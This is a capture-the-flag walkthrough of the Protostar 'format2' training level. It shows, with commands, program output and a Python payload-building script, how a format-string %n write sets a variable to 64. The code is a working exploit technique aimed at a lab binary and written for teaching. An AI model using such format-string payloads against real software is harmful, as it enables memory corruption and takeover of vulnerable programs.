Protostar 0x12 Format2
Prev: 0x11 - Format1
Next: 0x13 - Format3
This level asks us to leverage the arbitrary write technique from the prior level to write a specific value - "64" in this case - into memory.
Let's first use objdump to determine the location of our "target" variable, which we know must reside somewhere in the BSS segment.
$ objdump -t /opt/protostar/bin/format2
/opt/protostar/bin/format2: file format elf32-i386
SYMBOL TABLE:
08048114 l d .interp 00000000 .interp
08048128 l d .note.ABI-tag 00000000 .note.ABI-tag
...
080496d8 g O .bss 00000004 stdin@@GLIBC_2.0
080496e4 g O .bss 00000004 target
So, our target resides at 0x80496e4. Let's now try to locate our input string on the stack. We'll enter "AAAA" and print 10 words from the stack with "%x", searching for "41414141", which would indicate the start of our string.
$ python -c 'print "A" * 4 + "%x "*10' | /opt/protostar/bin/format2
AAAA200 b7fd8420 bffff5e4 41414141 25207825 78252078 20782520 25207825 78252078 20782520
Well, that's much more convenient than last time! "AAAA" shows up as the fourth word, so we only need three other conversions before the %n to point "printf" at the start of our string. If we replace "AAAA" with the address of target, the %n we provide as the fourth conversion will write the number of characters printed so far into "target"!
To break it down more clearly, here is our payload:
- The address of target: 0x80496e4
- Three dummy modifiers so that "printf" points to the start of our string. We will use %x
- A dummy buffer to bring the total characters written thus far up to 64 (length TBD)
- %n to trigger the write
We'll start with 30 As and see what "target" is set to:
$ python -c 'print "\xe4\x96\x04\x08" + "%x" * 3 + "A" * 30 + "%n"' | /opt/protostar/bin/format2
200b7fd8420bffff5e4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
target is 53 :(
"target" became 53: the 4-byte address, the 19 characters produced by the three %x conversions ("200", "b7fd8420", "bffff5e4"), and 30 As. So let's add 11 As to bring it up to 64! Our final input:
$ python -c 'print "\xe4\x96\x04\x08" + "%x" * 3 + "A" * 41 + "%n"' | /opt/protostar/bin/format2
200b7fd8420bffff5e4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
Success!
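The trial-and-error padding above only works because the three leaked words happened to print as 3, 8 and 8 characters. The usual way to make the count independent of whatever is on the stack is to give the "%x" conversions a fixed width ("%8x" always prints 8 characters for a 32-bit word) and to put the remaining padding in the width of the last conversion. The following Python 3 script is an added example, not part of the original writeup: it builds both the writeup's payload and a fixed-width one for the address and offset found above, and emulates how "printf" counts characters up to the "%n" so the resulting value can be checked without the binary. The leaked stack words, the emulator (which only understands the "%x", "%Nx" and "%n" conversions used here) and the assumption that every conversion consumes one 32-bit word are mine.

```python
import re
import struct
import sys

TARGET = 0x080496e4   # address of "target" from objdump -t format2 (from the writeup)
OFFSET = 4            # our input shows up as the 4th word "%x" prints
WANTED = 64           # value the level wants written

# The three stack words printf consumed before reaching our buffer in the
# writeup's run: "200 b7fd8420 bffff5e4". Constructed from the page's output.
LEAKED = [0x200, 0xB7FD8420, 0xBFFFF5E4]

# Subset of printf conversions the emulator understands: %x, %Nx and %n.
CONV = re.compile(rb"%(\d*)([xn])")


def writeup_payload(target, offset, pad):
    """The page's approach: address, (offset-1) bare %x, pad bytes, then %n.
    The written count depends on how wide the leaked words print."""
    return struct.pack("<I", target) + b"%x" * (offset - 1) + b"A" * pad + b"%n"


def fixed_width_payload(target, offset, value, width=8):
    """Address, then fixed-width %x conversions, the last one widened so that
    exactly `value` bytes precede %n regardless of the stack contents.
    width=8 is safe for 32-bit words: %x never prints more than 8 hex digits."""
    addr = struct.pack("<I", target)
    before_last = len(addr) + (offset - 2) * width    # bytes printed before the last %x
    last_width = value - before_last
    if last_width < 1:
        raise ValueError("value %d is too small for this prefix" % value)
    fmt = (b"%%%dx" % width) * (offset - 2) + (b"%%%dx" % last_width) + b"%n"
    return addr + fmt


def stack_for(payload):
    """Assumed stack layout: the leaked words, then our own buffer word by word
    (the payload starts with the target address, so that is word number OFFSET)."""
    own = [struct.unpack_from("<I", payload, i)[0]
           for i in range(0, len(payload) - len(payload) % 4, 4)]
    return LEAKED + own


def simulate_printf(fmt, stack_words):
    """Emulate printf(fmt) reading 32-bit words for each conversion.
    Returns (bytes printed, value %n stores, address %n stores to)."""
    words = iter(stack_words)
    out = bytearray()
    pos = 0
    n_value = n_ptr = None
    for m in CONV.finditer(fmt):
        out += fmt[pos:m.start()]
        pos = m.end()
        width = int(m.group(1) or 0)
        word = next(words)
        if m.group(2) == b"x":
            out += (b"%x" % word).rjust(width, b" ")   # %Nx right-justifies with spaces
        else:
            n_value, n_ptr = len(out), word            # %n: bytes written so far
    out += fmt[pos:]
    return bytes(out), n_value, n_ptr


def written_value(payload, stack_words=None):
    """Convenience: the number %n would store for this payload."""
    return simulate_printf(payload, stack_words or stack_for(payload))[1]


if __name__ == "__main__":
    payload = fixed_width_payload(TARGET, OFFSET, WANTED)
    # Pipe this into /opt/protostar/bin/format2 (newline comes after %n, so it is not counted).
    sys.stdout.buffer.write(payload + b"\n")
```

Run it as `python3 format2_payload.py | /opt/protostar/bin/format2`; the emitted string is `\xe4\x96\x04\x08%8x%8x%44x%n`, which writes 64 no matter what the first three stack words contain, whereas the 41-A payload only lands on 64 when those words print as exactly 19 characters.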